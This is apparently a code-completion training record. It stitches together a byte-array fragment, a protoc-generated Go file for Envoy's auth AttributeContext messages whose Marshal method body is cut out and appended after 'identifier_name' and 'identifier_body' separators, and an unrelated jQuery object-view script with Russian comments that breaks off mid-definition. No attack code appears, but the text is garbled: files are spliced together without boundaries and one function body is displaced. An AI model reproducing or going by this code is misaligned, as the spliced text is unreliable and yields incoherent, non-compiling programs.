0x27, 0xb0, 0xb5, 0xfa, 0x4a, 0xef, 0xc3, 0x72, 0x7c, 0x08, 0xcf, 0x85, 0x74, 0x32, 0x54, 0x4a,
0x5e, 0x2f, 0x56, 0x2b, 0x72, 0xbc, 0x79, 0x5b, 0x92, 0x89, 0x69, 0x6b, 0xd2, 0x9a, 0xf6, 0x6c,
0x7f, 0x7b, 0x7f, 0x02, 0x00, 0x00, 0xff, 0xff, 0x2f, 0xed, 0x07, 0x53, 0x12, 0x06, 0x00, 0x00,
}
| GetMetadataContext | identifier_name |
attribute_context.pb.go | // Code generated by protoc-gen-go. DO NOT EDIT.
// source: envoy/service/auth/v2/attribute_context.proto
package envoy_service_auth_v2
import (
fmt "fmt"
core "github.com/cilium/proxy/go/envoy/api/v2/core"
proto "github.com/golang/protobuf/proto"
timestamp "github.com/golang/protobuf/ptypes/timestamp"
math "math"
)
// Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
var _ = math.Inf
// This is a compile-time assertion to ensure that this generated file
// is compatible with the proto package it is being compiled against.
// A compilation error at this line likely means your copy of the
// proto package needs to be updated.
const _ = proto.ProtoPackageIsVersion3 // please upgrade the proto package
// An attribute is a piece of metadata that describes an activity on a network.
// For example, the size of an HTTP request, or the status code of an HTTP response.
//
// Each attribute has a type and a name, which is logically defined as a proto message field
// of the `AttributeContext`. The `AttributeContext` is a collection of individual attributes
// supported by Envoy authorization system.
// [#comment: The following items are left out of this proto
// Request.Auth field for jwt tokens
// Request.Api for api management
// Origin peer that originated the request
// Caching Protocol
// request_context return values to inject back into the filter chain
// peer.claims -- from X.509 extensions
// Configuration
// - field mask to send
// - which return values from request_context are copied back
// - which return values are copied into request_headers]
// [#next-free-field: 12]
type AttributeContext struct {
// The source of a network activity, such as starting a TCP connection.
// In a multi hop network activity, the source represents the sender of the
// last hop.
Source *AttributeContext_Peer `protobuf:"bytes,1,opt,name=source,proto3" json:"source,omitempty"`
// The destination of a network activity, such as accepting a TCP connection.
// In a multi hop network activity, the destination represents the receiver of
// the last hop.
Destination *AttributeContext_Peer `protobuf:"bytes,2,opt,name=destination,proto3" json:"destination,omitempty"`
// Represents a network request, such as an HTTP request.
Request *AttributeContext_Request `protobuf:"bytes,4,opt,name=request,proto3" json:"request,omitempty"`
// This is analogous to http_request.headers, however these contents will not be sent to the
// upstream server. Context_extensions provide an extension mechanism for sending additional
// information to the auth server without modifying the proto definition. It maps to the
// internal opaque context in the filter chain.
ContextExtensions map[string]string `protobuf:"bytes,10,rep,name=context_extensions,json=contextExtensions,proto3" json:"context_extensions,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// Dynamic metadata associated with the request.
MetadataContext *core.Metadata `protobuf:"bytes,11,opt,name=metadata_context,json=metadataContext,proto3" json:"metadata_context,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext) Reset() { *m = AttributeContext{} }
func (m *AttributeContext) String() string { return proto.CompactTextString(m) }
func (*AttributeContext) ProtoMessage() {}
func (*AttributeContext) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0}
}
func (m *AttributeContext) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext.Unmarshal(m, b)
}
func (m *AttributeContext) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext.Marshal(b, m, deterministic)
}
func (m *AttributeContext) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext.Merge(m, src)
}
func (m *AttributeContext) XXX_Size() int {
return xxx_messageInfo_AttributeContext.Size(m)
}
func (m *AttributeContext) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext proto.InternalMessageInfo
func (m *AttributeContext) GetSource() *AttributeContext_Peer {
if m != nil {
return m.Source
}
return nil
}
func (m *AttributeContext) GetDestination() *AttributeContext_Peer {
if m != nil {
return m.Destination
}
return nil
}
func (m *AttributeContext) GetRequest() *AttributeContext_Request {
if m != nil {
return m.Request
}
return nil
}
func (m *AttributeContext) GetContextExtensions() map[string]string {
if m != nil {
return m.ContextExtensions
}
return nil
}
func (m *AttributeContext) GetMetadataContext() *core.Metadata {
if m != nil {
return m.MetadataContext
}
return nil
}
// This message defines attributes for a node that handles a network request.
// The node can be either a service or an application that sends, forwards,
// or receives the request. Service peers should fill in the `service`,
// `principal`, and `labels` as appropriate.
// [#next-free-field: 6]
type AttributeContext_Peer struct {
// The address of the peer, this is typically the IP address.
// It can also be UDS path, or others.
Address *core.Address `protobuf:"bytes,1,opt,name=address,proto3" json:"address,omitempty"`
// The canonical service name of the peer.
// It should be set to :ref:`the HTTP x-envoy-downstream-service-cluster
// <config_http_conn_man_headers_downstream-service-cluster>`
// If a more trusted source of the service name is available through mTLS/secure naming, it
// should be used.
Service string `protobuf:"bytes,2,opt,name=service,proto3" json:"service,omitempty"`
// The labels associated with the peer.
// These could be pod labels for Kubernetes or tags for VMs.
// The source of the labels could be an X.509 certificate or other configuration.
Labels map[string]string `protobuf:"bytes,3,rep,name=labels,proto3" json:"labels,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The authenticated identity of this peer.
// For example, the identity associated with the workload such as a service account.
// If an X.509 certificate is used to assert the identity this field should be sourced from
// `URI Subject Alternative Names`, `DNS Subject Alternate Names` or `Subject` in that order.
// The primary identity should be the principal. The principal format is issuer specific.
//
// Example:
// * SPIFFE format is `spiffe://trust-domain/path`
// * Google account format is `https://accounts.google.com/{userid}`
Principal string `protobuf:"bytes,4,opt,name=principal,proto3" json:"principal,omitempty"`
// The X.509 certificate used to authenticate the identify of this peer.
// When present, the certificate contents are encoded in URL and PEM format.
Certificate string `protobuf:"bytes,5,opt,name=certificate,proto3" json:"certificate,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Peer) Reset() { *m = AttributeContext_Peer{} }
func (m *AttributeContext_Peer) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Peer) ProtoMessage() {}
func (*AttributeContext_Peer) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 0}
}
func (m *AttributeContext_Peer) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Peer.Unmarshal(m, b)
}
func (m *AttributeContext_Peer) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Peer.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Peer) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Peer.Merge(m, src)
}
func (m *AttributeContext_Peer) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Peer.Size(m)
}
func (m *AttributeContext_Peer) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Peer.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Peer proto.InternalMessageInfo
func (m *AttributeContext_Peer) GetAddress() *core.Address {
if m != nil {
return m.Address
}
return nil
}
func (m *AttributeContext_Peer) GetService() string {
if m != nil {
return m.Service
}
return ""
}
func (m *AttributeContext_Peer) GetLabels() map[string]string {
if m != nil {
return m.Labels
}
return nil
}
func (m *AttributeContext_Peer) GetPrincipal() string {
if m != nil {
return m.Principal
}
return ""
}
func (m *AttributeContext_Peer) GetCertificate() string {
if m != nil {
return m.Certificate
}
return ""
}
// Represents a network request, such as an HTTP request.
type AttributeContext_Request struct {
// The timestamp when the proxy receives the first byte of the request.
Time *timestamp.Timestamp `protobuf:"bytes,1,opt,name=time,proto3" json:"time,omitempty"`
// Represents an HTTP request or an HTTP-like request.
Http *AttributeContext_HttpRequest `protobuf:"bytes,2,opt,name=http,proto3" json:"http,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Request) Reset() { *m = AttributeContext_Request{} }
func (m *AttributeContext_Request) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Request) ProtoMessage() {}
func (*AttributeContext_Request) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 1}
}
func (m *AttributeContext_Request) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Request.Unmarshal(m, b)
}
func (m *AttributeContext_Request) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Request.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Request) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Request.Merge(m, src)
}
func (m *AttributeContext_Request) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Request.Size(m)
}
func (m *AttributeContext_Request) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Request.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Request proto.InternalMessageInfo
func (m *AttributeContext_Request) GetTime() *timestamp.Timestamp {
if m != nil {
return m.Time
}
return nil
}
func (m *AttributeContext_Request) GetHttp() *AttributeContext_HttpRequest {
if m != nil {
return m.Http
}
return nil
}
// This message defines attributes for an HTTP request.
// HTTP/1.x, HTTP/2, gRPC are all considered as HTTP requests.
// [#next-free-field: 12]
type AttributeContext_HttpRequest struct {
// The unique ID for a request, which can be propagated to downstream
// systems. The ID should have low probability of collision
// within a single day for a specific service.
// For HTTP requests, it should be X-Request-ID or equivalent.
Id string `protobuf:"bytes,1,opt,name=id,proto3" json:"id,omitempty"`
// The HTTP request method, such as `GET`, `POST`.
Method string `protobuf:"bytes,2,opt,name=method,proto3" json:"method,omitempty"`
// The HTTP request headers. If multiple headers share the same key, they
// must be merged according to the HTTP spec. All header keys must be
// lower-cased, because HTTP header keys are case-insensitive.
Headers map[string]string `protobuf:"bytes,3,rep,name=headers,proto3" json:"headers,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The request target, as it appears in the first line of the HTTP request. This includes
// the URL path and query-string. No decoding is performed.
Path string `protobuf:"bytes,4,opt,name=path,proto3" json:"path,omitempty"`
// The HTTP request `Host` or 'Authority` header value.
Host string `protobuf:"bytes,5,opt,name=host,proto3" json:"host,omitempty"`
// The HTTP URL scheme, such as `http` and `https`.
Scheme string `protobuf:"bytes,6,opt,name=scheme,proto3" json:"scheme,omitempty"`
// This field is always empty, and exists for compatibility reasons. The HTTP URL query is
// included in `path` field.
Query string `protobuf:"bytes,7,opt,name=query,proto3" json:"query,omitempty"`
// This field is always empty, and exists for compatibility reasons. The URL fragment is
// not submitted as part of HTTP requests; it is unknowable.
Fragment string `protobuf:"bytes,8,opt,name=fragment,proto3" json:"fragment,omitempty"`
// The HTTP request size in bytes. If unknown, it must be -1.
Size int64 `protobuf:"varint,9,opt,name=size,proto3" json:"size,omitempty"`
// The network protocol used with the request, such as "HTTP/1.0", "HTTP/1.1", or "HTTP/2".
//
// See :repo:`headers.h:ProtocolStrings <source/common/http/headers.h>` for a list of all
// possible values.
Protocol string `protobuf:"bytes,10,opt,name=protocol,proto3" json:"protocol,omitempty"`
// The HTTP request body.
Body string `protobuf:"bytes,11,opt,name=body,proto3" json:"body,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_HttpRequest) Reset() { *m = AttributeContext_HttpRequest{} }
func (m *AttributeContext_HttpRequest) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_HttpRequest) ProtoMessage() {}
func (*AttributeContext_HttpRequest) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 2}
}
func (m *AttributeContext_HttpRequest) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_HttpRequest.Unmarshal(m, b)
}
func (m *AttributeContext_HttpRequest) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) |
func (m *AttributeContext_HttpRequest) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_HttpRequest.Merge(m, src)
}
func (m *AttributeContext_HttpRequest) XXX_Size() int {
return xxx_messageInfo_AttributeContext_HttpRequest.Size(m)
}
func (m *AttributeContext_HttpRequest) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_HttpRequest.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_HttpRequest proto.InternalMessageInfo
func (m *AttributeContext_HttpRequest) GetId() string {
if m != nil {
return m.Id
}
return ""
}
func (m *AttributeContext_HttpRequest) GetMethod() string {
if m != nil {
return m.Method
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHeaders() map[string]string {
if m != nil {
return m.Headers
}
return nil
}
func (m *AttributeContext_HttpRequest) GetPath() string {
if m != nil {
return m.Path
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHost() string {
if m != nil {
return m.Host
}
return ""
}
func (m *AttributeContext_HttpRequest) GetScheme() string {
if m != nil {
return m.Scheme
}
return ""
}
func (m *AttributeContext_HttpRequest) GetQuery() string {
if m != nil {
return m.Query
}
return ""
}
func (m *AttributeContext_HttpRequest) GetFragment() string {
if m != nil {
return m.Fragment
}
return ""
}
func (m *AttributeContext_HttpRequest) GetSize() int64 {
if m != nil {
return m.Size
}
return 0
}
func (m *AttributeContext_HttpRequest) GetProtocol() string {
if m != nil {
return m.Protocol
}
return ""
}
func (m *AttributeContext_HttpRequest) GetBody() string {
if m != nil {
return m.Body
}
return ""
}
func init() {
proto.RegisterType((*AttributeContext)(nil), "envoy.service.auth.v2.AttributeContext")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.ContextExtensionsEntry")
proto.RegisterType((*AttributeContext_Peer)(nil), "envoy.service.auth.v2.AttributeContext.Peer")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.Peer.LabelsEntry")
proto.RegisterType((*AttributeContext_Request)(nil), "envoy.service.auth.v2.AttributeContext.Request")
proto.RegisterType((*AttributeContext_HttpRequest)(nil), "envoy.service.auth.v2.AttributeContext.HttpRequest")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.HttpRequest.HeadersEntry")
}
func init() {
proto.RegisterFile("envoy/service/auth/v2/attribute_context.proto", fileDescriptor_a6030c9468e3591b)
}
var fileDescriptor_a6030c9468e3591b = []byte{
// 640 bytes of a gzipped FileDescriptorProto
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0x9c, 0x53, 0x4d, 0x6f, 0xd3, 0x4c,
0x10, 0x56, 0x3e, 0x9a, 0x34, 0x93, 0x57, 0x2f, 0x65, 0x45, 0x2b, 0xcb, 0x54, 0x6a, 0x04, 0x97,
0x1e, 0xc0, 0x96, 0x52, 0x0e, 0xa5, 0x87, 0x8a, 0x96, 0x16, 0x8a, 0x04, 0x28, 0xb2, 0x38, 0x71,
0xa9, 0x36, 0xf6, 0xb4, 0x5e, 0x11, 0x7b, 0xdd, 0xdd, 0x71, 0xd4, 0x70, 0x84, 0x5f, 0x82, 0xf8,
0xa3, 0x68, 0x3f, 0x5c, 0xa2, 0x92, 0x43, 0xdb, 0x93, 0x67, 0xc6, 0xcf, 0x3c, 0x3b, 0x33, 0xcf,
0x0c, 0xbc, 0xc4, 0x72, 0x2e, 0x17, 0xb1, 0x46, 0x35, 0x17, 0x29, 0xc6, 0xbc, 0xa6, 0x3c, 0x9e,
0x8f, 0x63, 0x4e, 0xa4, 0xc4, 0xb4, 0x26, 0x3c, 0x4f, 0x65, 0x49, 0x78, 0x4d, 0x51, 0xa5, 0x24,
0x49, 0xb6, 0x69, 0xe1, 0x91, 0x87, 0x47, 0x06, 0x1e, 0xcd, 0xc7, 0xe1, 0x8e, 0x63, 0xe1, 0x95,
0x30, 0xc9, 0xa9, 0x54, 0x18, 0xf3, 0x2c, 0x53, 0xa8, 0xb5, 0xcb, 0x0b, 0xb7, 0xff, 0x05, 0x4c,
0xb9, 0x46, 0xff, 0x77, 0xe7, 0x52, 0xca, 0xcb, 0x19, 0xc6, 0xd6, 0x9b, 0xd6, 0x17, 0x31, 0x89,
0x02, 0x35, 0xf1, 0xa2, 0x72, 0x80, 0x67, 0xbf, 0x00, 0x36, 0x8e, 0x9a, 0x92, 0xde, 0xba, 0x8a,
0xd8, 0x09, 0xf4, 0xb4, 0xac, 0x55, 0x8a, 0x41, 0x6b, 0xd4, 0xda, 0x1d, 0x8e, 0x5f, 0x44, 0x2b,
0x8b, 0x8b, 0x6e, 0x27, 0x46, 0x13, 0x44, 0x95, 0xf8, 0x5c, 0xf6, 0x19, 0x86, 0x19, 0x6a, 0x12,
0x25, 0x27, 0x21, 0xcb, 0xa0, 0xfd, 0x00, 0xaa, 0x65, 0x02, 0xf6, 0x01, 0xfa, 0x0a, 0xaf, 0x6a,
0xd4, 0x14, 0x74, 0x2d, 0x57, 0x7c, 0x57, 0xae, 0xc4, 0xa5, 0x25, 0x4d, 0x3e, 0x2b, 0x80, 0xf9,
0xe9, 0x9f, 0xe3, 0x35, 0x61, 0xa9, 0x85, 0x2c, 0x75, 0x00, 0xa3, 0xce, 0xee, 0x70, 0x7c, 0x78,
0x57, 0x56, 0xff, 0x3d, 0xbd, 0x21, 0x38, 0x2d, 0x49, 0x2d, 0x92, 0xc7, 0xe9, 0xed, 0x38, 0x7b,
0x07, 0x1b, 0x05, 0x12, 0xcf, 0x38, 0xf1, 0x46, 0xf5, 0x60, 0x68, 0x5b, 0x78, 0xea, 0x1f, 0xe3,
0x95, 0x30, 0x6f, 0x18, 0xf9, 0xa2, 0x4f, 0x1e, 0x9a, 0x3c, 0x6a, 0x92, 0xfc, 0x4b, 0xe1, 0xef,
0x36, 0x74, 0xcd, 0x5c, 0xd8, 0x2b, 0xe8, 0xfb, 0x2d, 0xf0, 0x0a, 0x85, 0x2b, 0x78, 0x8e, 0x1c,
0x22, 0x69, 0xa0, 0x2c, 0x80, 0xbe, 0x6f, 0xca, 0x8a, 0x31, 0x48, 0x1a, 0x97, 0x4d, 0xa0, 0x37,
0xe3, 0x53, 0x9c, 0xe9, 0xa0, 0x63, 0x67, 0xb0, 0x7f, 0x1f, 0x95, 0xa2, 0x8f, 0x36, 0xd5, 0x75,
0xef, 0x79, 0xd8, 0x36, 0x0c, 0x2a, 0x25, 0xca, 0x54, 0x54, 0x7c, 0x66, 0xe5, 0x1a, 0x24, 0x7f,
0x03, 0x6c, 0x04, 0xc3, 0x14, 0x15, 0x89, 0x0b, 0x91, 0x72, 0xc2, 0x60, 0xcd, 0xfe, 0x5f, 0x0e,
0x85, 0xaf, 0x61, 0xb8, 0x44, 0xcb, 0x36, 0xa0, 0xf3, 0x0d, 0x17, 0xb6, 0xd9, 0x41, 0x62, 0x4c,
0xf6, 0x04, 0xd6, 0xe6, 0x7c, 0x56, 0x37, 0xad, 0x38, 0xe7, 0xa0, 0xbd, 0xdf, 0x0a, 0x7f, 0xb4,
0xa0, 0xef, 0x15, 0x67, 0x11, 0x74, 0xcd, 0xc6, 0xdf, 0x4c, 0xc9, 0x9d, 0x43, 0xd4, 0x9c, 0x43,
0xf4, 0xa5, 0x39, 0x87, 0xc4, 0xe2, 0xd8, 0x7b, 0xe8, 0xe6, 0x44, 0x95, 0x5f, 0xd6, 0xbd, 0xbb,
0x8e, 0xe1, 0x8c, 0xa8, 0x6a, 0x96, 0xcc, 0x12, 0x84, 0x3f, 0x3b, 0x30, 0x5c, 0x8a, 0xb2, 0xff,
0xa1, 0x2d, 0x32, 0x5f, 0x7f, 0x5b, 0x64, 0x6c, 0x0b, 0x7a, 0x05, 0x52, 0x2e, 0x33, 0x5f, 0xbf,
0xf7, 0xd8, 0x57, 0xe8, 0xe7, 0xc8, 0x33, 0x54, 0x8d, 0x14, 0x6f, 0x1e, 0x50, 0x43, 0x74, 0xe6,
0x28, 0x9c, 0x24, 0x0d, 0x21, 0x63, 0xd0, 0xad, 0x38, 0xe5, 0x5e, 0x0e, 0x6b, 0x9b, 0x58, 0x2e,
0x35, 0x79, 0x09, 0xac, 0x6d, 0x6a, 0xd3, 0x69, 0x8e, 0x05, 0x06, 0x3d, 0x57, 0x9b, 0xf3, 0xcc,
0xc8, 0xaf, 0x6a, 0x54, 0x8b, 0xa0, 0xef, 0x46, 0x6e, 0x1d, 0x16, 0xc2, 0xfa, 0x85, 0xe2, 0x97,
0x05, 0x96, 0x14, 0xac, 0xdb, 0x1f, 0x37, 0xbe, 0x61, 0xd7, 0xe2, 0x3b, 0x06, 0x83, 0x51, 0x6b,
0xb7, 0x93, 0x58, 0xdb, 0xe0, 0xed, 0xf8, 0x53, 0x39, 0x0b, 0xc0, 0xe1, 0x1b, 0xdf, 0xe0, 0xa7,
0x32, 0x5b, 0xd8, 0xe3, 0x18, 0x24, 0xd6, 0x0e, 0x0f, 0xe0, 0xbf, 0xe5, 0x76, 0xee, 0xb5, 0x0a,
0x27, 0xb0, 0xb5, 0xfa, 0x4a, 0xef, 0xc3, 0x72, 0x7c, 0x08, 0xcf, 0x85, 0x74, 0x32, 0x54, 0x4a,
0x5e, 0x2f, 0x56, 0x2b, 0x72, 0xbc, 0x79, 0x5b, 0x92, 0x89, 0x69, 0x6b, 0xd2, 0x9a, 0xf6, 0x6c,
0x7f, 0x7b, 0x7f, 0x02, 0x00, 0x00, 0xff, 0xff, 0x2f, 0xed, 0x07, 0x53, 0x12, 0x06, 0x00, 0x00,
}
| {
return xxx_messageInfo_AttributeContext_HttpRequest.Marshal(b, m, deterministic)
} | identifier_body |
1602.object_view.js | /*
Structure: objectView
*/
$.ov = {
views:[],
objectMemberValue: function(x){/* {{{ */
var val;
switch(typeof x){
case 'boolean':
val = '<input type="checkbox" '+(x?'checked ':'')+'/>';
break;
case 'number':
val = '<pre style="color:blue">'+x+'</pre>';
break;
case 'string':
val = '<pre style="color:red;max-height:300px;overflow:auto;">"'+String(x).substr(0,50).replace(/</g,'<')+'"</pre>';
break;
case 'function':
val = 'function';
break;
default:
case 'object':
val = x;
break;
}
return val;
/* }}} */
},
objectToRows: function(ovid,path,className){/* {{{ */
var level = path.length;
var pathStr = path.join('.');
var view = this.views[ovid];
var obj = view.object;
var exp = view.expanded;
for(var i in path)obj = obj[path[i]];
var r = '';
if(typeof className == 'undefined')className = obj.className;
var cl = this.classes[className];
var isCollection =
(obj.constructor==Array)
||
(typeof obj == 'object' && cl && cl.collection && cl.collection.exceptedIndex && !obj[cl.collection.exceptedIndex]);
if(cl && !isCollection){ // в объектной модели нашлось описание класса объекта и объект не коллекция
for(var i in cl.members){
var x = obj[i];
var mem = cl.members[i];
if(typeof x == 'undefined' && !mem.calculated){
if(mem.notNull || typeof mem.editing == 'undefined'){
if(/^_{2}[a-z]$/.test(i)){
r+='<tr><th colspan="2">'+mem+'</th></tr>';
}
continue;
}
x = mem.editing.defaultValue;
}
var newPathStr = pathStr+(level>0?'.':'')+i;
var label = i;
var value = x;
// Редактируем в случае если для класса обозначена редактируемость
// и для члена она не запрещена
// или для члена разрешена редактируемость и для класса она не запрещена
// и при этом если член - объект и для него задан объект редактирования
if(
(
(cl.editing && !(mem.editing===false))
||
(!cl.editing && mem.editing)
)&&(
!(typeof x == 'object' && typeof mem.editing != 'object')
)
){ // Edit
var type = (mem.editing&&mem.editing.type)?mem.editing.type:mem.editing;
switch(type){
case 'textarea':
value = '<textarea path="'+newPathStr+'" rows="'+(mem.editing&&mem.editing.rows?mem.editing.rows:3)+'" onblur="$.ov.saveValue(this);">'+String(x).replace(/</g,'<')+'</textarea>';
break;
case 'password':
case 'text':
default:
value = '<input type="'+(type=='password'?type:'text')+'" path="'+newPathStr+'" value="'+String(x).replace(/\"/g,'"').replace(/[\n\r]/,"")+'" onblur="$.ov.saveValue(this);" />';
break;
case 'select':
var opts = '';
for(var i in mem.editing.opts){
opts+='<option '+(x==mem.editing.opts[i]?'selected':'')+'>'+mem.editing.opts[i]+'</option>';
}
value = '<select path="'+newPathStr+'" onchange="$.ov.saveValue(this);">'+opts+'</select>';
break;
}
}else{ // Readonly
var c = $.ov.classes[mem.className];
if(typeof mem.asString == 'function'){
value = mem.asString.apply(obj,[x]);
}else if(c){
if(c.collection && typeof c.collection.value == 'function')
value = $.ov.classes[mem.className].collection.value.apply(x);
}
}
if(typeof mem == 'string'){
label = mem;
}else if(typeof mem == 'object' && mem.label){
label = mem.label;
}
var levelup = 'class="likealink" onclick="$(this.parentNode).objectView(\''+newPathStr+'\''+(mem.className?',\''+mem.className+'\'':'')+')"';
var is_levelup = false;
if(typeof x == 'object')for(var xxx in x){is_levelup = true; break;}
var expanded = is_levelup && (cm_in_array(exp,newPathStr) || x.__ov_expanded || mem.defaultExpanded);
r+='<tr level="'+level+'" expanded="'+(expanded?1:0)+'" '+(mem.className?'iclass="'+mem.className+'"':'')+'><td class="'+(is_levelup?'likealink ':'')+'ovColMain" style="padding-left:'+(15*level+3)+'px" '+(is_levelup?levelup:'')+'>'+label+'</td><td class="ovColumn">'+value+'</td></tr>';
// Рекурсивно вычисляем развернутых потомков
if(expanded)r+=$.ov.objectToRows(ovid,newPathStr.split('.'),mem.className);
}
}else{ // не удалось найти описание объекта, либо объект - коллекция
for(var i in obj){
try{
var x = obj[i];
}catch(e){
continue;
}
var defExp = false;
if(cl && isCollection){
var vis = cl.collection.visible;
if(typeof vis == 'function' && !vis(i,obj[i]))continue;
var label = typeof cl.collection.index == 'function'?cl.collection.index.apply(obj[i],[i,obj[i]]):i;
var val = typeof cl.collection.value == 'function'?cl.collection.value.apply(obj[i]):obj[i];
var is_levelup = (typeof cl.collection.expandable == 'undefined' && typeof x == 'object')?true:!!cl.collection.expandable;
defExp = !!cl.collection.defaultExpanded;
}else{
var label = i;
var val = this.objectMemberValue(x);
var is_levelup = false;
if(typeof x != 'string')for(var xxx in x){is_levelup = true; break;}
}
var newPathStr = pathStr+(level>0?'.':'')+i;
var levelup = ' onclick="$(this.parentNode).objectView(\''+newPathStr+'\''+(cl?',\''+className+'\'':'')+')"';
var expanded = is_levelup && (cm_in_array(exp,newPathStr) || x.__ov_expanded || defExp);
r+='<tr level="'+level+'" expanded="'+(expanded?1:0)+'" '+(cl?'iclass="'+className+'"':'')+'><td class="'+(is_levelup?'likealink ':'')+'ovColMain" style="padding-left:'+(15*level+3)+'px" '+(is_levelup?levelup:'')+'>'+label+'</td><td class="ovColumn">'+val+'</td></tr>';
// Рекурсивно вычисляем развернутых потомков
if(expanded)r+=$.ov.objectToRows(ovid,newPathStr.split('.'),(cl?className:void(0)));
}
}
if(r=='')r='<tr level="'+level+'"><td class="ovColMain" style="padding-left:'+(15*level)+'px">empty</td><td class="ovColumn">empty</td></tr>';
// Отметить вершину как "expanded"
if(level>0)exp.push(pathStr);
return r;
/* }}} */
},
saveValue: function(el){/* {{{ */
var tag = el.tagName.toLowerCase();
switch(tag){
case 'select':
case 'textarea':
case 'input':
// Прекращаем работу функции, если ничего не изменилось
if(tag !='select' && el.defaultValue==el.value)return;
// Выходим на объект и его значение
var ovid = el.parentNode.parentNode.parentNode.parentNode.parentNode.attributes.ovid.nodeValue;
var obj = $.ov.views[ovid].object;
var path = el.attributes.path.nodeValue.split('.');
var last = path.pop();
for(var i in path)obj = obj[path[i]];
// Сохраняем значение в объекте
el.defaultValue = el.value;
obj[last] = el.value;
// Обновляем родителя (если есть)
var tr = el.parentNode.parentNode;
var curLevel = Number(tr.attributes.level.nodeValue);
var sibling = tr.previousSibling;
if(curLevel>0){
while(sibling && Number(sibling.attributes.level.nodeValue)==curLevel)
sibling=sibling.previousSibling;
}
if(sibling){ // Нашли строку таблицы, содержащую родителя
var cl = $.ov.classes[sibling.attributes.iclass.nodeValue];
sibling.childNodes[1].innerHTML = typeof cl.collection.value == 'function'?cl.collection.value(obj):obj;
}
break;
break;
}
/* }}} */
},
handleAction: function(ovid,path,index,field,className){
$.ov.classes[className].members[field].action.apply($.ov.views[ovid].object[path][index]);
},
classes:{}
};
/* {{{ */
$.ov.classes.userTesting = {
members:{
subject: 'Предмет',
script: 'Сценарий',
userName: 'Тестируемый',
result: {
label: 'Результат',
asString: function(){return '<b>'+String(Math.round(Number(this.result)*10)/10)+'%</b>';}
},
attempts: {
label: 'Попытки',
asString: function(x){
var n = x.length;
if(n%10>4 || n%10==0 || (n>10 && n<20)) return n+' попыток';
if(n%10==1) return n+' попытка';
return n+' попытки';
},
className: 'testAttempt',
defaultExpanded: true
}
}
};
$.ov.classes.testAttempt= {
members:{
timeBegin: {
label:'Открыта',
asString:function(x){
return x?x.toDate().asFormat():'';
}
},
timeEnd: {
label:'Закрыта',
asString:function(x){
return x?x.toDate().asFormat():'';
}
},
result: {
label: 'Результат',
asString: function(){return '<b>'+String(Math.round(Number(this.result)*10)/10)+'%</b>';}
},
themes: {
label: 'Заданные вопросы',
className: 'testTheme',
defaultExpanded: true,
asString: function(){
return '';
}
}
},
collection: {
index: function(i,val){
return 'Попытка №'+(Number(i)+1);
},
value: function(){
return (Math.round(Number(this.result)*10)/10)+'%';
},
defaultExpanded: true,
expandable: true
}
};
$.ov.classes.testTheme = {
members:{
themeName: 'Название',
questCount: 'Кол-во вопросов',
correctAns: 'Отвечено верно',
result: {
calculated: true,
label: 'Результат по теме',
asString: function(){return Math.round((this.correctAns/this.questCount)*1000)/10+'%';}
},
questions: {
label: 'Вопросы темы',
className: 'testQuestion',
defaultExpanded: true,
asString: function(){
return '';
}
}
